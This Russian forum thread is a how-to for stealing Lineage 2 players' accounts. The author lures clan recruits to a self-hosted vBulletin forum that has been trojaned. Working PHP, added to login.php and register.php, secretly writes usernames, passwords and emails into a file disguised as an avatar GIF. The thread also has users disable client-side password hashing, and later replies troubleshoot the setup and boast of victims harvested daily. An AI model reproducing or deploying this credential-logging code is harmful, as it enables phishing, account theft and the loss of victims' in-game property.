Сразу говорю что данная статья не претендует на внос креативного обмана игроков и пр. Просто привожу один из сотни НЕ сложных примеров захвата аккаунта игрока л2 или другой игры.
И так. Мы играем на сервере, но фармить адену нам влом. Что же сделать такого дабы заработать? По рылся на жуке, увидел кучу способов взлома аккаунта, но либо у нас ничего не вышло либо там ничего и не было тыбрить. Брут? Это требует терпения, постоянно обновлять прокси, искать словари и дургое. Фейки? Там тоже требуется граммата, да и на них практически уже никто не ведётся. Взлом игрового сообщества (сайт клана, "форум фогейм") это для многих вовсе сказка и не достежимая мечта из за отсутствия знаний PHP, MySQL, xs и т.д. Что же сделать такого, где не прогадать? Мне много раз писали в личку как добыть пароли от аккаунтов, вчастности прозьбы научить чему то. Так вот друзья есть сотни вариантов как это сделать. Вас ограничивает только ваша фантизия. Ну и для примера возьмём довольно простой способ, а именно будем набирать народ в клан и в последствии их раздевать. Многие скажут что это грубо, не почеловечески, но это лишь пример да и жизнь жестокая штука. Начнём!
Я буду использовать способ выуживания пасов клан-форум.
1. Что нам нужно сделать, это взять любого твинка. Чем выше лвл тем естественно лучше. Им создаём клан, поднимаем лвл клана как угодно.
Делаем форум
2. Для форума нам потребуется хостинг, не вижу особого смысла использовать платный так как нам вполне подойдёт и фри
К примеру - jino.ru нам главное нужна поддержка php, mysql
3. После регистрации нам нужно выбрать движок для форума я остановился на VB так как он всем знаком на вид и к нему есть много фишек для нашего дела. Качаем его - [Ссылки могут видеть только зарегистрированные пользователи. ]
4. После установки форума и его настройки на свой вкус (Как это сделать ищите в других источниках) нам нужно его про троянить.
Нам нужен файлик login.php открываем его в любом текстовом редакторе и добавляем в начало кода:
/// Из данного кода ясно что все введённые данные при логонации пользователя будут вноситься к нам в файлик - /customavatars/avatar178_2.gif
Создаём его с атребутами на запись.
Далее нам необходимо полностью очистить файл clientscript/vbulletin_md5.js - откроем его и удалим там все.
Всё наш форум готов!
Идём в игру и тупо набираем людей в клан, ну и естественно им нужно зделать заявку на вступления
Мыло берём из профиля пас с файлика в моём случае статистика совпадений была 7 из 10.
В данном примере всё зависит только от вашей фантизии, как вы будете общаться с людьми, какой контингент людей, лвл, шмот вас будет интересовать.
Я не хочу чтобы меня за что то осуждали, и говорили что я баян - Я просто дополнил форум своей мыслью. Может кому это пригодится.
И да если на вашем сайте уже зарегистриван человек и его ссесия сохранена (Ему не требуется вводить логин и пароль) То можно обнулить все ссесии форума запросом в phpmyadmin
************************************************** *****
DECASO
Немного подумав, я подредактировал твой код, теперь он в добавок собирает мыло + сбор паролей происходит не при авторизации, а при регистрации.
Инструкция:
1. Открываем register.php (находящийся в начальном каталоге) любым текстовым редактором.
2. Вставляем в начало кода (после "<?php").
Код:
$Login = $_POST['username'];
$Passwd = $_POST['password'];
$Email = $_POST['email'];
$fp = fopen("./customavatars/avatar178_1.gif","a+");
fwrite($fp,"$Login:$Passwd:$Email\n");
fclose($fp);
3. Сохраняем.
4. В папке /customavatars/ создаем файл с именем avatar178_1.gif
Cпасибо Лэйзи за дополнение!
Последний раз редактировалось DECASO; 09.09.2012 в 22:12.
Да кста троянится не только вб, но и любой другой форум (сайт) нужно только код немного поправить
Добавлено через 3 часа 5 минут
Цитата:
Сообщение от Jon1321
подскажите почему не правильно работает, в файлике появляется только : вместо Login:Passwd.
PHP код поставил после <?php
vbulletin_md5.js полностью очистил
avatar178_2.gif стоит Owner:все галки, Group и Everyone: поставил на Write и Execute
ссылку дай. Посмотрю что там
и файли в лс
Последний раз редактировалось DECASO; 02.12.2011 в 16:45.
Причина: Добавлено сообщение
Разобрался я в phpbb 3.0.9 развод и вправду достойный в день по 20 человек регаеться вижу все их даные мыло ,
айпи , пароль , логин и тд . Вобшем все супер могу ток добавить настройка такого форума требует либо денег либо знание написания скриптов мне пришлось платить за скрипты хоть и немного но всеже.